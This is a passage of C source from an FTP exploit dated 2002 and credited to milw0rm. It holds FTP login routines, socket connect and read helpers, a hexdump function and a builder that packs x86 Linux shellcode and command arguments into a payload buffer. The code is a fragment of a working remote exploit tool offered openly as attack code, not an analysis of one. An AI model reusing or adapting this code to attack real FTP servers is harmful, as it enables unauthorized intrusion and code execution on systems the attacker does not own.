if (memcmp (resp, "220 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
ftp_banner = strdup (resp);
net_write (ftpsock, "USER %s\n", user);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
if (memcmp (resp, "331 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
net_write (ftpsock, "PASS %s\n", pass);
memset (resp, '\x00', sizeof (resp));
if (net_rlinet (ftpsock, resp, sizeof (resp) - 1, 20) <= 0)
goto flerr;
/* handle multiline responses from ftp servers
*/
if (memcmp (resp, "230-", 4) == 0)
ftp_recv_until (ftpsock, resp, sizeof (resp), "230 ");
if (memcmp (resp, "230 ", 4) != 0) {
if (verbose)
printf ("\n%s\n", resp);
goto flerr;
}
return (ftpsock);
flerr:
if (ftpsock > 0)
close (ftpsock);
return (0);
}
/* ripped from zodiac */
void
hexdump (char *desc, unsigned char *data, unsigned int amount)
{
unsigned int dp, p; /* data pointer */
const char trans[] =
"................................ !\"#$%&'()*+,-./0123456789"
":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
"nopqrstuvwxyz{|}~...................................."
"....................................................."
"........................................";
printf ("/* %s, %u bytes */\n", desc, amount);
for (dp = 1; dp <= amount; dp++) {
fprintf (stderr, "%02x ", data[dp-1]);
if ((dp % 8) == 0)
fprintf (stderr, " ");
if ((dp % 16) == 0) {
fprintf (stderr, "| ");
p = dp;
for (dp -= 16; dp < p; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
fprintf (stderr, "\n");
}
fflush (stderr);
}
if ((amount % 16) != 0) {
p = dp = 16 - (amount % 16);
for (dp = p; dp > 0; dp--) {
fprintf (stderr, " ");
if (((dp % 8) == 0) && (p != 8))
fprintf (stderr, " ");
fflush (stderr);
}
fprintf (stderr, " | ");
for (dp = (amount - (16 - p)); dp < amount; dp++)
fprintf (stderr, "%c", trans[data[dp]]);
fflush (stderr);
}
fprintf (stderr, "\n");
return;
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n,
len,
error,
flags;
int fd;
struct timeval tv;
fd_set rset, wset;
struct sockaddr_in csa;
if (cs == NULL)
cs = &csa;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[1025];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
#ifdef DEBUG
printf ("[snd] %s%s", tmp, (tmp[strlen (tmp) - 1] == '\n') ? "" : "\n");
#endif
send(fd, tmp, i, 0);
return;
}
int
net_rlinet (int fd, char *buf, int bufsize, int sec)
{
int n;
unsigned long int rb = 0;
struct timeval tv_start, tv_cur;
memset(buf, '\0', bufsize);
(void) gettimeofday(&tv_start, NULL);
do {
(void) gettimeofday(&tv_cur, NULL);
if (sec > 0) {
if ((((tv_cur.tv_sec * 1000000) + (tv_cur.tv_usec)) -
((tv_start.tv_sec * 1000000) +
(tv_start.tv_usec))) > (sec * 1000000))
{
return (-1);
}
}
n = net_rtimeout(fd, NET_READTIMEOUT);
if (n <= 0) {
return (-1);
}
n = read(fd, buf, 1);
if (n <= 0) {
return (n);
}
rb++;
if (*buf == '\n')
return (rb);
buf++;
if (rb >= bufsize)
return (-2); /* buffer full */
} while (1);
}
int
net_rtimeout (int fd, int sec)
{
fd_set rset;
struct timeval tv;
int n, error, flags;
error = 0;
flags = fcntl(fd, F_GETFL, 0);
n = fcntl(fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1)
return (-1);
FD_ZERO(&rset);
FD_SET(fd, &rset);
tv.tv_sec = sec;
tv.tv_usec = 0;
/* now we wait until more data is received then the tcp low level
* watermark, which should be setted to 1 in this case (1 is default)
*/
n = select(fd + 1, &rset, NULL, NULL, &tv);
if (n == 0) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1) {
return (-1);
}
/* socket readable ? */
if (FD_ISSET(fd, &rset)) {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (1);
} else {
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
errno = ETIMEDOUT;
return (-1);
}
}
static int
sc_build_x86_lnx (unsigned char *target, size_t target_len,
unsigned char *shellcode, char **argv)
{
int i;
size_t tl_orig = target_len;
if (strlen (shellcode) >= (target_len - 1))
return (-1);
memcpy (target, shellcode, strlen (shellcode));
target += strlen (shellcode);
target_len -= strlen (shellcode);
for (i = 0 ; argv[i] != NULL ; ++i)
;
/* set argument count
*/
target[0] = (unsigned char) i;
target++;
target_len--;
for ( ; i > 0 ; ) {
i -= 1;
if (strlen (argv[i]) >= target_len)
return (-1);
printf ("[%3d/%3d] adding (%2d): %s\n",
(tl_orig - target_len), tl_orig,
strlen (argv[i]), argv[i]);
memcpy (target, argv[i], strlen (argv[i]));
target += strlen (argv[i]);
target_len -= strlen (argv[i]);
target[0] = (unsigned char) (i + 1);
target++;
target_len -= 1;
}
return (tl_orig - target_len);
}
// milw0rm.com [2002-05-14]